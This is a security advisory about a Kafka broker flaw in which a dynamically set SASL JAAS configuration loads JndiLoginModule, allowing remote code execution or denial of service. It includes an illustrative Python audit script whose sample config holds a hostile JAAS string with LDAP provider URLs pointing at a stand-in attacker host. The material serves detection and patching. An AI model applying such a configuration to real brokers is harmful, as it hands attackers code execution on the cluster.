BIT-kafka-2025-27819
RCE/Denial of service vulnerability in kafka_2.10 (Maven)
What is BIT-kafka-2025-27819 About?
This vulnerability allows Remote Code Execution (RCE) or Denial of Service (DoS) against Apache Kafka brokers through a SASL JAAS configuration that loads the JDK's JndiLoginModule. It is the broker-side variant of CVE-2023-25194, which was reported for the Kafka Connect API; here the broker itself loads the attacker-controlled login module. Exploitation requires network connectivity to the Kafka cluster and an authenticated identity holding the AlterConfigs permission on the cluster resource.
Affected Software
- org.apache.kafka:kafka_2.12 (versions <3.4.0)
- org.apache.kafka:kafka_2.13 (versions <3.4.0)
Technical Details
Kafka brokers accept SASL JAAS configuration per listener and mechanism (the `listener.name.<listener>.<mechanism>.sasl.jaas.config` property), and that property can be set at runtime through the dynamic broker configuration API. The JAAS string names an arbitrary login module class, and before Kafka 3.4.0 the broker placed no restriction on which class could be named. As with the earlier Kafka Connect issue (CVE-2023-25194), an attacker who can connect to the cluster and holds the AlterConfigs permission on the cluster resource can therefore point a listener's JAAS configuration at `com.sun.security.auth.module.JndiLoginModule` with provider URLs under their control. When the broker initialises that login module it performs a JNDI lookup against the attacker's server; the response can be used to trigger Java deserialization on the broker, giving arbitrary code execution, or to make the lookup fail or hang in a way that degrades or crashes the broker (denial of service).
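As an added example (not code from the advisory or from the Kafka project), the following Python audit script parses `sasl.jaas.config` values in the format the broker accepts (`<LoginModuleClass> <controlFlag> [key=value ...];`) and flags any entry whose login module is on a deny list, mirroring the restriction Kafka 3.4.0 introduced. The configuration dictionary, the listener names and the host `attacker.example` are constructed for illustration; the two `com.sun.security.auth.module.*` class names are the real JDK login modules, and the deny list beyond JndiLoginModule is this script's own conservative choice.

```python
"""Audit Kafka broker config entries for login modules a broker must never load.
Illustrative tooling, not part of Apache Kafka."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Kafka 3.4.0+ rejects JndiLoginModule by default; LdapLoginModule is added here
# as an assumption (it also performs JNDI lookups against a configured server).
DISALLOWED_LOGIN_MODULES = {
    "com.sun.security.auth.module.JndiLoginModule",
    "com.sun.security.auth.module.LdapLoginModule",
}

_CONTROL_FLAGS = {"required", "requisite", "sufficient", "optional"}
# Matches either key=value (value optionally quoted) or a bare token.
_TOKEN = re.compile(r'([^\s=;]+)=("[^"]*"|\'[^\']*\'|[^\s;]+)|([^\s;]+)')
# Any config key ending in sasl.jaas.config, including per-listener variants.
_JAAS_KEY = re.compile(r"(?:^|\.)sasl\.jaas\.config$")


@dataclass
class LoginModuleEntry:
    module_class: str
    control_flag: str
    options: dict[str, str] = field(default_factory=dict)


def parse_jaas_config(value: str) -> list[LoginModuleEntry]:
    """Parse one sasl.jaas.config value into its login-module entries.

    Raises ValueError on malformed input so that an unparseable value is never
    silently treated as safe."""
    entries: list[LoginModuleEntry] = []
    for stmt in value.split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        tokens = _TOKEN.findall(stmt)
        bare = [b for _, _, b in tokens if b]
        if len(bare) != 2 or bare[1].lower() not in _CONTROL_FLAGS:
            raise ValueError(f"malformed JAAS entry: {stmt!r}")
        options = {k: v.strip("\"'") for k, v, _ in tokens if k}
        entries.append(LoginModuleEntry(bare[0], bare[1].lower(), options))
    return entries


def audit_broker_config(config: dict[str, str]) -> list[dict]:
    """Return one finding per disallowed (or unparseable) JAAS entry.

    `config` is a flat mapping of broker config keys to values, e.g. the
    per-broker dynamic configs obtained from the admin API (assumption)."""
    findings: list[dict] = []
    for key, raw in config.items():
        if not _JAAS_KEY.search(key):
            continue
        try:
            modules = parse_jaas_config(raw)
        except ValueError as exc:
            findings.append({"key": key, "module": None, "reason": str(exc)})
            continue
        for m in modules:
            if m.module_class in DISALLOWED_LOGIN_MODULES:
                findings.append({
                    "key": key,
                    "module": m.module_class,
                    "reason": "disallowed login module",
                    "options": m.options,  # provider URLs show where the broker would connect
                })
    return findings


# Constructed sample of per-listener broker configuration (not real cluster data).
SAMPLE_BROKER_CONFIG = {
    "listener.name.sasl_ssl.scram-sha-512.sasl.jaas.config":
        "org.apache.kafka.common.security.scram.ScramLoginModule required;",
    "listener.name.sasl_plaintext.plain.sasl.jaas.config":
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://attacker.example:1389/o=x" '
        'group.provider.url="ldap://attacker.example:1389/o=x";',
    "listener.name.sasl_ssl.gssapi.sasl.jaas.config":
        'com.sun.security.auth.module.Krb5LoginModule required '
        'useKeyTab=true keyTab="/etc/security/kafka.keytab" '
        'principal="kafka/broker1.example@EXAMPLE";',
    "log.retention.hours": "168",
}

if __name__ == "__main__":
    for finding in audit_broker_config(SAMPLE_BROKER_CONFIG):
        print(finding)
```

Run against the sample, the script reports exactly one finding: the `plain` listener entry that loads JndiLoginModule, together with the `user.provider.url` and `group.provider.url` options that reveal which host the broker would contact. Feeding it a JAAS string it cannot parse produces a finding rather than a pass, which is the behaviour you want from an audit check.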
What is the Impact of BIT-kafka-2025-27819?
Successful exploitation may allow attackers to achieve remote code execution on the Kafka brokers, leading to full system compromise, or cause a denial of service, rendering the Kafka cluster unavailable.
What is the Exploitability of BIT-kafka-2025-27819?
Exploitation is remote in the sense that it is carried out over the Kafka protocol against the cluster's configuration, but it is not unauthenticated: the attacker must be able to connect to the cluster and must hold the AlterConfigs permission on the cluster resource. That permission is normally reserved for administrators, so the attacker needs either a compromised privileged credential or an overly broad ACL. Attack complexity is moderate: the attacker crafts a JAAS configuration string that loads JndiLoginModule with provider URLs pointing at a server they control, then applies it through dynamic broker configuration. Because the outcome is code execution on the broker, the risk is high wherever an account with AlterConfigs can be obtained. Kafka 3.4.0 and later refuse to load JndiLoginModule by default (the `org.apache.kafka.disallowed.login.modules` system property controls the deny list), so only older releases, and deployments that have re-enabled the module, remain exposed.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for BIT-kafka-2025-27819?
Available Upgrade Options
- org.apache.kafka:kafka_2.13 <3.4.0 → Upgrade to 3.4.0
- org.apache.kafka:kafka_2.12 <3.4.0 → Upgrade to 3.4.0
Until the upgrade is complete, limit the AlterConfigs operation on the Cluster resource to broker administrators, since that permission is the precondition for the attack, and review existing dynamic broker configuration for any `sasl.jaas.config` value that names `com.sun.security.auth.module.JndiLoginModule`. After upgrading, do not override the default value of `org.apache.kafka.disallowed.login.modules`, which is what keeps the module disabled.
What are Similar Vulnerabilities to BIT-kafka-2025-27819?
Similar Vulnerabilities: CVE-2023-25194, CVE-2022-23305, CVE-2021-35293, CVE-2020-1945, CVE-2017-1038
